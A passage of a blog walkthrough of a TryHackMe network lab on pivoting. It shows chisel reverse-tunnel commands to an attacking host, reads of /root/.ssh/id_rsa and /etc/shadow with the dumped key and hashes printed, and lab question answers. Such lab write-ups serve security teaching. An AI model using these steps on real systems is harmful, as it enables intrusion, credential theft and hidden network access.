On our own attacking box we would use a command that looks something like this:</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>./chisel server <span class="nt">-p</span> LISTEN_PORT <span class="nt">--reverse</span> &amp; 
</pre></td></tr></tbody></table></code></div></div>

<p>This sets up a listener on your chosen <code class="language-plaintext highlighter-rouge">LISTEN_PORT</code>.</p>

<p>On the compromised host, we would use the following command:</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>./chisel client ATTACKING_IP:LISTEN_PORT R:socks &amp;
</pre></td></tr></tbody></table></code></div></div>
<p>[c]</p>

<p>Find the  .ssh Private key  under <code class="language-plaintext highlighter-rouge">/root/.ssh/id_rsa</code></p>

<blockquote>
  <p>[root@prod-serv usr]# cat /root/.ssh/id_rsa
—–BEGIN OPENSSH PRIVATE KEY—–
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAs0oHYlnFUHTlbuhePTNoITku4OBH8OxzRN8O3tMrpHqNH3LHaQRE
LgAe9qk9dvQA7pJb9V6vfLc+Vm6XLC1JY9Ljou89Cd4AcTJ9OruYZXTDnX0hW1vO5Do1bS
jkDDIfoprO37/YkDKxPFqdIYW0UkzA60qzkMHy7n3kLhab7gkV65wHdIwI/v8+SKXlVeeg
0+L12BkcSYzVyVUfE6dYxx3BwJSu8PIzLO/XUXXsOGuRRno0dG3XSFdbyiehGQlRIGEMzx
hdhWQRry2HlMe7A5dmW/4ag8o+NOhBqygPlrxFKdQMg6rLf8yoraW4mbY7rA7/TiWBi6jR
fqFzgeL6W0hRAvvQzsPctAK+ZGyGYWXa4qR4VIEWnYnUHjAosPSLn+o8Q6qtNeZUMeVwzK
H9rjFG3tnjfZYvHO66dypaRAF4GfchQusibhJE+vlKnKNpZ3CtgQsdka6oOdu++c1M++Zj
z14DJom9/CWDpvnSjRRVTU1Q7w/1MniSHZMjczIrAAAFiMfOUcXHzlHFAAAAB3NzaC1yc2
EAAAGBALNKB2JZxVB05W7oXj0zaCE5LuDgR/Dsc0TfDt7TK6R6jR9yx2kERC4AHvapPXb0
AO6SW/Ver3y3PlZulywtSWPS46LvPQneAHEyfTq7mGV0w519IVtbzuQ6NW0o5AwyH6Kazt
+/2JAysTxanSGFtFJMwOtKs5DB8u595C4Wm+4JFeucB3SMCP7/Pkil5VXnoNPi9dgZHEmM
1clVHxOnWMcdwcCUrvDyMyzv11F17DhrkUZ6NHRt10hXW8onoRkJUSBhDM8YXYVkEa8th5
THuwOXZlv+GoPKPjToQasoD5a8RSnUDIOqy3/MqK2luJm2O6wO/04lgYuo0X6hc4Hi+ltI
UQL70M7D3LQCvmRshmFl2uKkeFSBFp2J1B4wKLD0i5/qPEOqrTXmVDHlcMyh/a4xRt7Z43
2WLxzuuncqWkQBeBn3IULrIm4SRPr5SpyjaWdwrYELHZGuqDnbvvnNTPvmY89eAyaJvfwl
g6b50o0UVU1NUO8P9TJ4kh2TI3MyKwAAAAMBAAEAAAGAcLPPcn617z6cXxyI6PXgtknI8y
lpb8RjLV7+bQnXvFwhTCyNt7Er3rLKxAldDuKRl2a/kb3EmKRj9lcshmOtZ6fQ2sKC3yoD
oyS23e3A/b3pnZ1kE5bhtkv0+7qhqBz2D/Q6qSJi0zpaeXMIpWL0GGwRNZdOy2dv+4V9o4
8o0/g4JFR/xz6kBQ+UKnzGbjrduXRJUF9wjbePSDFPCL7AquJEwnd0hRfrHYtjEd0L8eeE
egYl5S6LDvmDRM+mkCNvI499+evGwsgh641MlKkJwfV6/iOxBQnGyB9vhGVAKYXbIPjrbJ
r7Rg3UXvwQF1KYBcjaPh1o9fQoQlsNlcLLYTp1gJAzEXK5bC5jrMdrU85BY5UP+wEUYMbz
TNY0be3g7bzoorxjmeM5ujvLkq7IhmpZ9nVXYDSD29+t2JU565CrV4M69qvA9L6ktyta51
bA4Rr/l9f+dfnZMrKuOqpyrfXSSZwnKXz22PLBuXiTxvCRuZBbZAgmwqttph9lsKp5AAAA
wBMyQsq6e7CHlzMFIeeG254QptEXOAJ6igQ4deCgGzTfwhDSm9j7bYczVi1P1+BLH1pDCQ
viAX2kbC4VLQ9PNfiTX+L0vfzETRJbyREI649nuQr70u/9AedZMSuvXOReWlLcPSMR9Hn7
bA70kEokZcE9GvviEHL3Um6tMF9LflbjzNzgxxwXd5g1dil8DTBmWuSBuRTb8VPv14SbbW
HHVCpSU0M82eSOy1tYy1RbOsh9hzg7hOCqc3gqB+sx8bNWOgAAAMEA1pMhxKkqJXXIRZV6
0w9EAU9a94dM/6srBObt3/7Rqkr9sbMOQ3IeSZp59KyHRbZQ1mBZYo+PKVKPE02DBM3yBZ
r2u7j326Y4IntQn3pB3nQQMt91jzbSd51sxitnqQQM8cR8le4UPNA0FN9JbssWGxpQKnnv
m9kI975gZ/vbG0PZ7WvIs2sUrKg++iBZQmYVs+bj5Tf0CyHO7EST414J2I54t9vlDerAcZ
DZwEYbkM7/kXMgDKMIp2cdBMP+VypVAAAAwQDV5v0L5wWZPlzgd54vK8BfN5o5gIuhWOkB
2I2RDhVCoyyFH0T4Oqp1asVrpjwWpOd+0rVDT8I6rzS5/VJ8OOYuoQzumEME9rzNyBSiTw
YlXRN11U6IKYQMTQgXDcZxTx+KFp8WlHV9NE2g3tHwagVTgIzmNA7EPdENzuxsXFwFH9TY
EsDTnTZceDBI6uBFoTQ1nIMnoyAxOSUC+Rb1TBBSwns/r4AJuA/d+cSp5U0jbfoR0R/8by
GbJ7oAQ232an8AAAARcm9vdEB0bS1wcm9kLXNlcnYBAg==
—–END OPENSSH PRIVATE KEY—–</p>
</blockquote>

<p>Create a File for the id_rsa key</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">sudo </span>nano id_rsa
</pre></td></tr></tbody></table></code></div></div>

<p>now change its permissions</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">sudo chmod </span>600 id_rsa    
</pre></td></tr></tbody></table></code></div></div>

<p>Next, Lets ssh into the machine using out id_rsa file ad the key</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>ssh <span class="nt">-i</span> id_rsa root@10.200.85.200
</pre></td></tr></tbody></table></code></div></div>

<h3 id="task-6-webserverexploitation"><span class="me-2">Task 6 Webserver Exploitation</span><a href="#task-6-webserverexploitation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<blockquote>
  <p>Which user was the server running as?
<em>root</em></p>
</blockquote>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">cat</span> /etc/shadow file
</pre></td></tr></tbody></table></code></div></div>
<p>```[root@prod-serv usr]# cat /etc/shadow file
root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1::0:99999:7::: 
bin:<em>:18358:0:99999:7:::
daemon:</em>:18358:0:99999:7:::
adm:<em>:18358:0:99999:7:::
lp:</em>:18358:0:99999:7:::
sync:<em>:18358:0:99999:7:::
shutdown:</em>:18358:0:99999:7:::
halt:<em>:18358:0:99999:7:::
mail:</em>:18358:0:99999:7:::
operator:<em>:18358:0:99999:7:::
games:</em>:18358:0:99999:7:::
ftp:<em>:18358:0:99999:7:::
nobody:</em>:18358:0:99999:7:::
dbus:!!:18573::::::
systemd-coredump:!!:18573::::::
systemd-resolve:!!:18573::::::
tss:!!:18573::::::
polkitd:!!:18573::::::
libstoragemgmt:!!:18573::::::
cockpit-ws:!!:18573::::::
cockpit-wsinstance:!!:18573::::::
sssd:!!:18573::::::
sshd:!!:18573::::::
chrony:!!:18573::::::
rngd:!!:18573::::::
twreath:$6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg.::0:99999:7:::
unbound:!!:18573::::::
apache:!!:18573::::::
nginx:!!:18573::::::
mysql:!!:18573::::::
cat: file: No such file or directory</p>

<blockquote>
  <p>What is the root user’s password hash?
<code class="language-plaintext highlighter-rouge">`*"$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1"*</code></p>
</blockquote>

<blockquote>
  <p>What is the full path to this file?
<em>/root/.ssh/id_rsa</em></p>
</blockquote>

<h3 id="task-8-pivotinghigh-level-overview"><span class="me-2">Task 8 Pivoting High-level Overview</span><a href="#task-8-pivotinghigh-level-overview" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Pivoting is a crucial part of ethical hacking where we move from an initially compromised machine to infiltrate deeper into a target network. In this context, we have two main methods: Tunnelling/Proxying and Port Forwarding.</p>

<ol>
  <li>
    <p><strong>Tunnelling/Proxying</strong>: Imagine creating a secret tunnel through a compromised machine to connect to the target network. This helps route your traffic through the compromised machine, making it appear as if the traffic is originating from there. It’s like using a proxy server, but with a sneaky twist. This method is great when you want to direct various types of traffic into the target network. It can even be hidden within other protocols (like SSH), which helps you sneak past basic security measures like Intrusion Detection Systems or firewalls.</p>
  </li>
  <li>
    <p><strong>Port Forwarding</strong>: This is like setting up a special connection between a local port on your machine and a single port on the target machine, all through a compromised host. This method is faster and more dependable, but it only lets you access a single port (or a small range) on the target. Think of it as opening a secret door in a wall to access just one specific room in a building.</p>
  </li>
</ol>

<p>When deciding which pivoting style to use, the network layout plays a huge role. You need to do thorough enumeration first to understand the network’s structure. In simpler words, you need to gather information about the network, like figuring out where the weak points or vulnerabilities might be. Once you have that intel, you can decide whether to create a sneaky tunnel or open a secret door.</p>

<p>Remember, if you’ve got multiple ways to get into the network, it’s often smarter to use a Linux/Unix target. These systems tend to be more hacker-friendly for pivoting. For example, a Linux web server facing the outside world is an excellent starting point for your endeavors.</p>

<p>As you progress through your tasks, you’ll cover various topics:</p>

<ul>
  <li><strong>Enumerating a network</strong>: Using special tools that come with the operating system or that you’ve specially prepared, you’ll map out the network to understand its structure and weak points.</li>
  <li><strong>Proxychains / FoxyProxy</strong>: These tools help you set up proxies to divert your traffic in a sneaky way.</li>
  <li><strong>SSH port forwarding and tunnelling</strong>: Particularly useful for Unix systems, this involves using SSH to create secure tunnels to route traffic.</li>
  <li><strong>plink.exe</strong>: This one’s for Windows. It lets you create tunnels and manage connections.</li>
  <li><strong>socat</strong>: Works on both Windows and Unix. It’s a versatile tool for creating connections between different systems.</li>
  <li><strong>chisel</strong>: Works on both Windows and Unix. It’s another tool for setting up connections.</li>
  <li><strong>sshuttle</strong>: Currently available for Unix only. This tool allows you to redirect traffic through a secure SSH tunnel.</li>
</ul>

<p>Keep in mind that choosing the right method is all about adapting to the network’s layout and finding the best way to infiltrate and gather information. So, start with enumeration, map out the network, and then decide whether to set up a sneaky tunnel or open a secret door. Happy hacking!</p>

<blockquote>
  <p>Which type of pivoting creates a channel through which information can be sent hidden inside another protocol?
<em>Tunneling</em></p>
</blockquote>

<blockquote>
  <p>Not covered in this Network, but good to know about. Which Metasploit Framework Meterpreter command can be used to create a port forward?
*portfwd</p>
</blockquote>

<h2 id="task-9pivotingenumeration"><span class="me-2">Task 9  Pivoting Enumeration</span><a href="#task-9pivotingenumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<h2 id="enumeration-the-basics"><span class="me-2">Enumeration: The Basics</span><a href="#enumeration-the-basics" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Think of “enumeration” as collecting clues about a house (your target) before you decide how to enter it. The more clues you have, the better decisions you can make.</p>

<ol>
  <li><strong>Why is enumeration key?</strong> - Just as a detective gathers as much information as possible about a case, in cybersecurity, you want to gather as much information as possible about your target. More information = more strategies to get in or understand the system.</li>
</ol>

<h2 id="different-ways-to-gather-clues"><span class="me-2">Different Ways to Gather Clues:</span><a href="#different-ways-to-gather-clues" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li>
    <p><strong>Checking items in the house</strong> - Things like the host’s address book (hosts file) or recent visitors’ log (ARP cache) might have useful information.</p>
  </li>
  <li>
    <p><strong>Using tools in the house</strong> - Some houses have tools (like a telescope or binoculars) that you can use to see other houses in the neighborhood or understand the layout.</p>
  </li>
  <li>
    <p><strong>Bringing your own tools</strong> - If the house doesn’t have what you need, you might bring your own equipment. Some tools don’t rely on any other equipment to work (statically compiled tools), making them handy.</p>
  </li>
  <li>
    <p><strong>Crafty techniques</strong> - Like making a homemade periscope from household items (scripting techniques) to see around.</p>
  </li>
  <li>
    <p><strong>Using your own tools from far away</strong> - Imagine controlling a drone from your own house to fly around and inspect another house. This can be slow and less efficient but can work (using local tools through a proxy).</p>
  </li>
</ol>

<h2 id="lets-dive-deeper"><span class="me-2">Let’s Dive Deeper:</span><a href="#lets-dive-deeper" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li>
    <p><strong>Living off the Land (LotL)</strong> - This means using what’s already available in the house. For example, some houses might have binoculars (like Nmap on Linux), which you can use to inspect nearby houses.</p>
  </li>
  <li>
    <p><strong>Looking for Common Items</strong> - It’s smart to first check if there are any notes or logs in the house. These can be recent visitor logs (ARP cache) or even details about other houses (etc/hosts or DNS servers).</p>
  </li>
  <li>
    <p><strong>Static vs. Dynamic Tools</strong> - Tools you bring might either rely on equipment in the house (dynamic) or work entirely on their own (static). Static tools can be handy since they don’t need anything else to function.</p>
  </li>
  <li>
    <p><strong>Proxy Inspection</strong> - It’s like sending a drone (proxy) from your house to inspect. It can be slow and limited but can have its moments, especially when you need to use advanced features.</p>
  </li>
  <li>
    <p><strong>DIY Inspections with Shell</strong> - If tools like binoculars (Nmap) aren’t available, you might use household items (like Bash or Powershell) to create a makeshift tool. For instance, sending out invites (pings) to see which neighbors (IPs) respond.</p>
  </li>
  <li>
    <p><strong>Special Cases</strong>: Sometimes, even if a neighbor sees your invite, they might not respond (firewalls blocking pings). In such cases, you might need to try different strategies, like knocking on different doors (port scanning).</p>
  </li>
  <li>
    <p><strong>Experiment!</strong> - There are numerous ways to gather clues. As you gain experience, you’ll find creative ways to use what’s available and make your tools.</p>
  </li>
</ol>

<p>In essence, enumeration is about gathering as much information as possible, using a mix of available resources and crafty techniques, to better understand a target in the world of cybersecurity.</p>

<blockquote>
  <p>What is the absolute path to the file containing DNS entries on Linux?</p>
  <div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>/etc/resolv.conf
</pre></td></tr></tbody></table></code></div>  </div>
</blockquote>

<blockquote>
  <p>What is the absolute path to the hosts file on Windows?</p>
  <div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\d</span>rivers<span class="se">\e</span>tc<span class="se">\h</span>osts
</pre></td></tr></tbody></table></code></div>  </div>
</blockquote>

<p>let’s learn about different tool now, [[sshuttle]]</p>

<p>This tool differs significantly from the others we’ve covered. It doesn’t use port forwarding or traditional proxies. Instead, it creates an SSH-based tunnel proxy, acting like a new interface. This lets us route traffic as if using a VPN, without proxychains. It’s like a direct connection to the target network, offering encryption via SSH. We run sshuttle on our attacking machine, much like connecting to a remote server through SSH.</p>

<p>To be Continued
```</p>


  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/thm/">THM</a>,
          <a href="/categories/walkthrough/">Walkthrough</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/thm/"
            class="post-tag no-text-decoration"
          >thm</a>
        
          <a
            href="/tags/pivotinng/"
            class="post-tag no-text-decoration"
          >pivotinng</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=THM%20Wreath%20-%20Alienfader&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FWreath%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fab fa-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=THM%20Wreath%20-%20Alienfader&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FWreath%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FWreath%2F&text=THM%20Wreath%20-%20Alienfader" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/CrowdStrike-Fiasco/">The Largest IT Outage in History - CrowdStrike Incident Overview</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Navigating-2024/">Key Cybersecurity Trends and How to Stay Protected</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Welcome/">Welcome</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/IntelliJ-based-IDEs/">IntelliJ based IDEs Vulnerability</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Navigating-the-Waters-of-Cybersecurity-A-Close-Look-at-GitHubs-2024-Vulnerability/">Navigating the Waters of Cybersecurity: A Close Look at GitHub’s 2024 Vulnerability</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/news/">news</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/thm/">thm</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ai/">ai</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/bsod/">bsod</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/crowdstrike/">crowdstrike</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">cve</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/dirbuster/">dirbuster</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/first-post/">first post</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/github/">github</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/htb/">htb</a>
      
    </div>
  </section>


            </div>

            
              
              



  <section id="toc-wrapper" class="ps-0 pe-4">
    <h2 class="panel-heading ps-3 pt-2 mb-2">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->














  

  

  

  

  

  

  

  
    










  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/Rick-and-Morty/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1693551600"
  data-df="ll"
  
>
  Sep  1, 2023
</time>

              <h4 class="pt-0 my-2">Rick and Morty Walkthrogh</h4>
              <div class="text-muted">
                <p>
                  





                  Journey into the Rick and Morty Box: A Chill Dive
Watch the Video



Hey there, fellow techies! So, I recently jumped into this Rick and Morty-themed box, and boy, was it a trip! Let’s walk through...
                </p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/Paper/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>HTB Paper</p>
    </a>
  

  
    <a
      href="/posts/Rick-and-Morty/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>Rick and Morty Walkthrogh</p>
    </a>
  
</nav>

            
              
              <!--  The comments switcher -->


            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2024</time>

    
      <a href="https://twitter.com/Alienfader">Alienfader</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/news/">news</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/thm/">thm</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ai/">ai</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/bsod/">bsod</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/crowdstrike/">crowdstrike</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">cve</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/dirbuster/">dirbuster</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/first-post/">first post</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/github/">github</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/htb/">htb</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
